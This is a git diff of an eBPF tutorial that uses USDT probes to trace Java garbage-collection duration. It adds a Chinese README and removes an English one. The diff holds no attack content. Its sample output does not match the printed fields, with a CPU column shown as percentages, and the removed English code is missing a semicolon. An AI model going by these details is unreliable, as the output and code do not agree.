handle_event(void *ctx, int cpu, void *data, __u32 data_sz) } ``` -## 安装依赖 +## Installing Dependencies -构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 +To build the example, you need clang, libelf, and zlib. The package names may vary with different distributions. -在 Ubuntu/Debian 上,你需要执行以下命令: +On Ubuntu/Debian, run the following command: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -在 CentOS/Fedora 上,你需要执行以下命令: +On CentOS/Fedora, run the following command: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## 编译运行 +## Compiling and Running -在对应的目录中,运行 Make 即可编译运行上述代码: +In the corresponding directory, run Make to compile and run the code: ```console $ make @@ -307,21 +303,17 @@ TIME CPU PID GC TIME 10:00:05 11% 12345 50ms ``` -完整源代码: +Complete source code: - -参考资料: +References: - - -## 总结 +## Summary + +Through this introductory eBPF tutorial, we have learned how to use eBPF and USDT for dynamic tracing and analysis of Java garbage collection (GC) events. We have understood how to set USDT tracepoints in user space applications and how to write eBPF programs to capture information from these tracepoints, thereby gaining a deeper understanding of Java GC's behavior and performance and how to optimize them. -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。 +Additionally, we have also introduced some basic knowledge and practical techniques related to Java GC, USDT, and eBPF. This knowledge and skills are valuable for developers who want to delve into the field of network and system performance analysis. -此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。 -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 - -> The original link of this article: +If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website to get more examples and the complete tutorial.
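+For completeness, here is a minimal sketch of the perf-buffer boilerplate that this article omits. The skeleton header name `javagc.skel.h` and the `struct javagc_bpf` type are assumptions about the bpftool-generated skeleton (the exact names depend on the build); it reuses the `handle_event` callback shown above:
+
+```c
+/* Sketch of the omitted perf-buffer polling loop (assumed skeleton names). */
+#include <errno.h>
+#include <signal.h>
+#include <bpf/libbpf.h>
+#include "javagc.skel.h"
+
+static volatile sig_atomic_t exiting;
+
+static void sig_handler(int sig) { exiting = 1; }
+
+/* handle_event is the callback shown earlier in this article */
+static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz);
+
+static int poll_gc_events(struct javagc_bpf *skel)
+{
+    struct perf_buffer *pb;
+    int err = 0;
+
+    /* wire perf_map (the BPF side's perf event array) to handle_event */
+    pb = perf_buffer__new(bpf_map__fd(skel->maps.perf_map),
+                          64 /* ring pages per CPU */, handle_event,
+                          NULL /* lost-event callback */, NULL, NULL);
+    if (!pb)
+        return -errno;
+
+    signal(SIGINT, sig_handler);
+    while (!exiting) {
+        err = perf_buffer__poll(pb, 100 /* timeout, ms */);
+        if (err < 0 && err != -EINTR)
+            break;
+    }
+    perf_buffer__destroy(pb);
+    return err;
+}
+```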
diff --git a/src/15-javagc/README.zh.md b/src/15-javagc/README.zh.md new file mode 100644 index 0000000..7dd1e27 --- /dev/null +++ b/src/15-javagc/README.zh.md @@ -0,0 +1,327 @@ +# eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。 + +在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。 + +## USDT 介绍 + +USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。 + +### 用户层面的追踪机制:用户级动态跟踪和 USDT + +在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 `dispatch_command()` 函数上进行插桩,来跟踪服务器的查询请求: + +```bash +# ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' +Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end. + mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables" + mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers" +[...] +``` + +这里我们使用了 `uprobe` 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。 + +许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量: + +```bash +# ./uprobe -l /opt/bin/mysqld | more +account_hash_get_key +add_collation +add_compiled_collation +add_plugin_noargs +adjust_time_range +[...] +# ./uprobe -l /opt/bin/mysqld | wc -l +21809 +``` + +这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。 + +用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。 + +用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。 + +使用 USDT,我们可以简单地跟踪一个名为 `mysql:query__start` 的探针,而不是去跟踪那个名为 `_Z16dispatch_command19enum_server_commandP3THDPcj` 的 C++ 符号,也就是 `dispatch_command()` 函数。当然,我们仍然可以在需要的时候去跟踪 `dispatch_command()` 以及其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。 + +在 Linux 中的 USDT,无论是哪种形式的静态跟踪点,其实都已经存在了几十年。它最近由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。 + +你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 `readelf` 来进行检查,例如对于 Node.js: + +```bash +# readelf -n node +[...] +Notes at offset 0x00c43058 with length 0x00000494: + Owner Data size Description + stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors) + Provider: node + Name: gc__start + Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028 + Arguments: 4@%esi 4@%edx 8@%rdi +[...] + stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors) + Provider: node + Name: http__client__request + Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024 + Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp) +[...] 
+``` + +这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。 + +在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。 + +USDT 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +## Java GC 介绍 + +Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。 + +在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。 + +## eBPF 实现机制 + +Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。 + +### 内核态程序 + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#include <vmlinux.h> +#include <bpf/bpf_helpers.h> +#include <bpf/bpf_tracing.h> +#include <bpf/usdt.bpf.h> +#include "javagc.h" + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 100); + __type(key, uint32_t); + __type(value, struct data_t); +} data_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __type(key, int); + __type(value, int); +} perf_map SEC(".maps"); + +__u32 time; + +static int gc_start(struct pt_regs *ctx) +{ + struct data_t data = {}; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&data_map, &data.pid, &data, 0); + return 0; +} + +static int gc_end(struct pt_regs *ctx) +{ + struct data_t data = {}; + struct data_t *p; + __u32 val; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + p = bpf_map_lookup_elem(&data_map, &data.pid); + if (!p) + return 0; + + val = data.ts - p->ts; + if (val > time) { + data.ts = val; + bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); + } + bpf_map_delete_elem(&data_map, &data.pid); + return 0; +} + +SEC("usdt") +int handle_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +首先,我们定义了两个映射(map): + +- `data_map`:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。`data_t` 结构体包含进程 ID、CPU ID 和时间戳。 +- `perf_map`:这是一个 perf event array,用于将数据发送回用户态程序。 + +然后,我们有四个处理函数:`gc_start`、`gc_end` 和两个 USDT 处理函数 `handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end`。这些函数都用 BPF 的 `SEC("usdt")` 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件。 + +`gc_start` 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 `data_map`。 + +`gc_end` 函数在垃圾收集结束时被调用。它执行与 `gc_start` 类似的操作,但是它还从 `data_map` 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 `time`),那么它将数据发送回用户态程序。 + +`handle_gc_start` 和 `handle_gc_end` 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 `gc_start` 和 `gc_end`。 + +`handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end` 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 `gc_start` 和 `gc_end`。 + +最后,我们有一个 `LICENSE` 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。 + +### 用户态程序 + +用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。 + +第一个函数 `get_jvmso_path` 被用来获取运行的Java虚拟机(JVM)的 `libjvm.so` 库的路径。首先,它打开了 `/proc//maps`
文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 `libjvm.so` 的行,然后复制该行的路径到提供的参数中。 + +```c +static int get_jvmso_path(char *path) +{ + char mode[16], line[128], buf[64]; + size_t seg_start, seg_end, seg_off; + FILE *f; + int i = 0; + + sprintf(buf, "/proc/%d/maps", env.pid); + f = fopen(buf, "r"); + if (!f) + return -1; + + while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", + &seg_start, &seg_end, mode, &seg_off, line) == 5) { + i = 0; + while (isblank(line[i])) + i++; + if (strstr(line + i, "libjvm.so")) { + break; + } + } + + strcpy(path, line + i); + fclose(f); + + return 0; +} +``` + +接下来,我们看到的是将 eBPF 程序(函数 `handle_gc_start` 和 `handle_gc_end`)附加到Java进程的相关USDT探针上。每个程序都通过调用 `bpf_program__attach_usdt` 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,`bpf_program__attach_usdt` 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。 + +```c + skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "mem__pool__gc__begin", NULL); + if (!skel->links.handle_mem_pool_gc_start) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "mem__pool__gc__end", NULL); + if (!skel->links.handle_mem_pool_gc_end) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "gc__begin", NULL); + if (!skel->links.handle_gc_start) { + err = errno; + fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "gc__end", NULL); + if (!skel->links.handle_gc_end) { + err = errno; + fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); + goto cleanup; + } +``` + +最后一个函数 `handle_event` 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 `data_t` 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。 + +```c +static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) +{ + struct data_t *e = (struct data_t *)data; + struct tm *tm = NULL; + char ts[16]; + time_t t; + + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); +} +``` + +## 安装依赖 + +构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 + +在 Ubuntu/Debian 上,你需要执行以下命令: + +```shell +sudo apt install clang libelf1 libelf-dev zlib1g-dev +``` + +在 CentOS/Fedora 上,你需要执行以下命令: + +```shell +sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel +``` + +## 编译运行 + +在对应的目录中,运行 Make 即可编译运行上述代码: + +```console +$ make +$ sudo ./javagc -p 12345 +Tracing javagc time... Hit Ctrl-C to end. 
+TIME CPU PID GC TIME +10:00:01 10% 12345 50ms +10:00:02 12% 12345 55ms +10:00:03 9% 12345 47ms +10:00:04 13% 12345 52ms +10:00:05 11% 12345 50ms +``` + +完整源代码: + +- + +参考资料: + +- +- + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。 + +此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +> The original link of this article: diff --git a/src/15-javagc/README_en.md b/src/15-javagc/README_en.md deleted file mode 100644 index 1b76e18..0000000 --- a/src/15-javagc/README_en.md +++ /dev/null @@ -1,319 +0,0 @@ -# eBPF Tutorial by Example 15: Capturing User-Space Java GC Duration Using USDT - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT). - -In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. - -## Introduction to USDT - -USDT is a mechanism for inserting static tracepoints into applications, allowing developers to insert probes at critical points in the program for debugging and performance analysis purposes. These probes can be dynamically activated at runtime by tools such as DTrace, SystemTap, or eBPF, allowing access to the program's internal state and performance metrics without the need to restart the application or modify the program code. USDT is widely used in many open-source software applications such as MySQL, PostgreSQL, Ruby, Python, and Node.js. - -### User-Level Tracing Mechanism: User-Level Dynamic Tracing and USDT - -User-Level Dynamic Tracing allows us to instrument any user-level code by placing probes. For example, we can trace query requests in a MySQL server by placing a probe on the `dispatch_command()` function: - -```bash -# ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' -Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end. - mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables" - mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers" -[...] -``` - -Here, we use the `uprobe` tool, which leverages Linux's built-in functionalities: ftrace (tracing framework) and uprobes (User-Level Dynamic Tracing, requires a relatively new Linux version, around 4.0 or later). Other tracing frameworks such as perf_events and SystemTap can also achieve this functionality. - -Many other MySQL functions can be traced to obtain more information. We can list and count the number of these functions: - -```bash -# ./uprobe -l /opt/bin/mysqld | more -account_hash_get_key -add_collation -add_compiled_collation -add_plugin_noargs -adjust_time_range -[...] -# ./uprobe -l /opt/bin/mysqld | wc -l -21809 -``` - -There are 21,000 functions here. We can also trace library functions or even individual instruction offsets. 
- -User-Level Dynamic Tracing capability is very powerful and can solve numerous problems. However, using it also has some challenges: identifying the code to trace, handling function parameters, and dealing with code modifications. - -User-Level Statically Defined Tracing (USDT) can address some of these challenges. USDT probes (or "markers" at the user level) are trace macros inserted at critical positions in the code, providing a stable and well-documented API. This makes the tracing work simpler. - -With USDT, we can easily trace a probe called `mysql:query__start` instead of tracing the C++ symbol `_Z16dispatch_command19enum_server_commandP3THDPcj`, which is the `dispatch_command()` function. Of course, we can still trace `dispatch_command()` and the other 21,000 mysqld functions when needed, but only when USDT probes cannot solve the problem.In Linux, USDT (User Statically Defined Tracing) has actually existed in various forms for decades. It has recently gained attention again due to the popularity of Sun's DTrace tool, which has led to many common applications, including MySQL, PostgreSQL, Node.js, Java, etc., adding USDT support. SystemTap has developed a way to consume these DTrace probes. - -You may be running a Linux application that already includes USDT probes, or you may need to recompile it (usually with --enable-dtrace). You can use `readelf` to check, for example, for Node.js: - -```bash -# readelf -n node -[...] -Notes at offset 0x00c43058 with length 0x00000494: - Owner Data size Description - stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors) - Provider: node - Name: gc__start - Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028 - Arguments: 4@%esi 4@%edx 8@%rdi -[...] - stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors) - Provider: node - Name: http__client__request - Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024 - Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp) -[...] -``` - -This is a Node.js recompiled with --enable-dtrace and installed with the systemtap-sdt-dev package that provides "dtrace" functionality to support USDT. Here are two probes displayed: node:gc__start (garbage collection start) and node:http__client__request. - -At this point, you can use SystemTap or LTTng to trace these probes. However, built-in Linux tracers like ftrace and perf_events currently cannot do this (although perf_events support is under development). - -## Introduction to Java GC - -Java, as a high-level programming language, has automatic garbage collection (GC) as one of its core features. The goal of Java GC is to automatically reclaim memory space that is no longer used by the program, thereby relieving programmers of the burden of memory management. However, the GC process may cause application pauses, which can impact program performance and response time. Therefore, monitoring and analyzing Java GC events are essential for understanding and optimizing the performance of Java applications. - -In the following tutorial, we will demonstrate how to use eBPF and USDT to monitor and analyze the duration of Java GC events. We hope this content will be helpful to you in your work with eBPF for application performance analysis. - -USDT in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). 
bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -## eBPF Implementation Mechanism - -The eBPF program for Java GC is divided into two parts: kernel space and user space. We will introduce the implementation mechanisms of these two parts separately. - -### Kernel Space Program - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -/* Copyright (c) 2022 Chen Tao */ -#include -#include -#include -#include -#include "javagc.h" - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 100); - __type(key, uint32_t); - __type(value, struct data_t); -} data_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY) - __type(key, int); - __type(value, int); -} perf_map SEC(".maps"); - -__u32 time; - -static int gc_start(struct pt_regs *ctx) -{ - struct data_t data = {}; - - data.cpu = bpf_get_smp_processor_id(); - data.pid = bpf_get_current_pid_tgid() >> 32; - data.ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&data_map, &data.pid, &data, 0); - return 0; -} - -static int gc_end(struct pt_regs *ctx) -{ - struct data_t data = {}; - struct data_t *p; - __u32 val; - - data.cpu = bpf_get_smp_processor_id(); - data.pid = bpf_get_current_pid_tgid() >> 32; - data.ts = bpf_ktime_get_ns(); - p = bpf_map_lookup_elem(&data_map, &data.pid); - if (!p) - return 0; - - val = data.ts - p->ts; - if (val > time) { - data.ts = val; - bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); - } - bpf_map_delete_elem(&data_map, &data.pid); - return 0; -} - -SEC("usdt") -int handle_gc_start(struct pt_regs *ctx) -{ - return gc_start(ctx); -} - -SEC("usdt") -int handle_gc_end(struct pt_regs *ctx) -{ - return gc_end(ctx); -} - -SEC("usdt") -int handle_mem_pool_gc_start(struct pt_regs *ctx) -{ - return gc_start(ctx); -} - -SEC("usdt") -int handle_mem_pool_gc_end(struct pt_regs *ctx) -{ - return gc_end(ctx); -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -First, we define two maps: - -- `data_map`: This hashmap stores the start time of garbage collection for each process ID. The `data_t` structure contains the process ID, CPU ID, and timestamp. -- `perf_map`: This is a perf event array used to send data back to the user-space program. - -Then, we have four handler functions: `gc_start`, `gc_end`, and two USDT handler functions `handle_mem_pool_gc_start` and `handle_mem_pool_gc_end`. These functions are all annotated with the BPF `SEC("usdt")` macro to capture USDT events related to garbage collection in a Java process. - -The `gc_start` function is called when garbage collection starts. It first gets the current CPU ID, process ID, and timestamp, and then stores this data in `data_map`. - -The `gc_end` function is called when garbage collection ends. It performs similar operations as `gc_start`, but it also retrieves the start time from `data_map` and calculates the duration of garbage collection. If the duration exceeds a set threshold (`time` variable), it sends the data back to the user-space program. - -`handle_gc_start` and `handle_gc_end` are handler functions for the garbage collection start and end events, respectively, and they call `gc_start` and `gc_end`, respectively. 
- -`handle_mem_pool_gc_start` and `handle_mem_pool_gc_end` are handler functions for the garbage collection start and end events in the memory pool, and they also call `gc_start` and `gc_end`, respectively.Finally, we have a `LICENSE` array that declares the license of the BPF program, which is required for loading the BPF program. - -### User-space Program - -The main goal of the user-space program is to load and run eBPF programs, as well as process data from the kernel-space program. This is achieved through the use of the libbpf library. Here, we are omitting some common code for loading and running eBPF programs and only showing the parts related to USDT. - -The first function `get_jvmso_path` is used to obtain the path of the `libjvm.so` library for the running Java Virtual Machine (JVM). First, it opens the `/proc//maps` file, which contains the memory mapping information of the process address space. Then, it searches for the line that contains `libjvm.so` in the file and copies the path of that line to the provided argument. - -```c -static int get_jvmso_path(char *path) -{ - char mode[16], line[128], buf[64]; - size_t seg_start, seg_end, seg_off; - FILE *f; - int i = 0; - - sprintf(buf, "/proc/%d/maps", env.pid); - f = fopen(buf, "r"); - if (!f) - return -1; - - while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", - &seg_start, &seg_end, mode, &seg_off, line) == 5) { - i = 0; - while (isblank(line[i])) - i++; - if (strstr(line + i, "libjvm.so")) { - break; - } - } - - strcpy(path, line + i); - fclose(f); - - return 0; -} -``` - -Next, we see the attachment of the eBPF programs (`handle_gc_start` and `handle_gc_end`) to the relevant USDT probes in the Java process. Each program achieves this by calling the `bpf_program__attach_usdt` function, which takes as parameters the BPF program, the process ID, the binary path, and the provider and name of the probe. If the probe is successfully attached, `bpf_program__attach_usdt` will return a link object, which is stored in the skeleton's link member. If the attachment fails, the program will print an error message and perform cleanup. - -```c - skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, - binary_path, "hotspot", "mem__pool__gc__begin", NULL); - if (!skel->links.handle_mem_pool_gc_start) { - err = errno; - fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, - binary_path, "hotspot", "mem__pool__gc__end", NULL); - if (!skel->links.handle_mem_pool_gc_end) { - err = errno; - fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, -binary_path, "hotspot", "gc__begin", NULL); - if (!skel->links.handle_gc_start) { - err = errno; - fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, - binary_path, "hotspot", "gc__end", NULL); - if (!skel->links.handle_gc_end) { - err = errno; - fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); - goto cleanup; - } -``` - -The last function `handle_event` is a callback function used to handle data received from the perf event array. 
This function is triggered by the perf event array and is called each time a new event is received. The function first converts the data to a `data_t` structure, then formats the current time as a string, and finally prints the timestamp, CPU ID, process ID, and duration of the garbage collection. - -```c -static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) -{ - struct data_t *e = (struct data_t *)data; - struct tm *tm = NULL; - char ts[16]; - time_t t; - - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); -} -``` - -## Installing Dependencies - -To build the example, you need clang, libelf, and zlib. The package names may vary with different distributions. - -On Ubuntu/Debian, run the following command: - -```shell -sudo apt install clang libelf1 libelf-dev zlib1g-dev -``` - -On CentOS/Fedora, run the following command: - -```shell -sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel -``` - -## Compiling and Running - -In the corresponding directory, run Make to compile and run the code: - -```console -$ make -$ sudo ./javagc -p 12345 -Tracing javagc time... Hit Ctrl-C to end. -TIME CPU PID GC TIME -10:00:01 10% 12345 50ms -10:00:02 12% 12345 55ms -10:00:03 9% 12345 47ms -10:00:04 13% 12345 52ms -10:00:05 11% 12345 50ms -``` - -Complete source code: - -- - -References: - -- -- - -Summary.Through this introductory eBPF tutorial, we have learned how to use eBPF and USDT for dynamic tracing and analysis of Java garbage collection (GC) events. We have understood how to set USDT tracepoints in user space applications and how to write eBPF programs to capture information from these tracepoints, thereby gaining a deeper understanding and optimizing the behavior and performance of Java GC. - -Additionally, we have also introduced some basic knowledge and practical techniques related to Java GC, USDT, and eBPF. This knowledge and skills are valuable for developers who want to delve into the field of network and system performance analysis. - -If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website to get more examples and the complete tutorial. diff --git a/src/16-memleak/README.md b/src/16-memleak/README.md index 0dfb2f4..03d3494 100644 --- 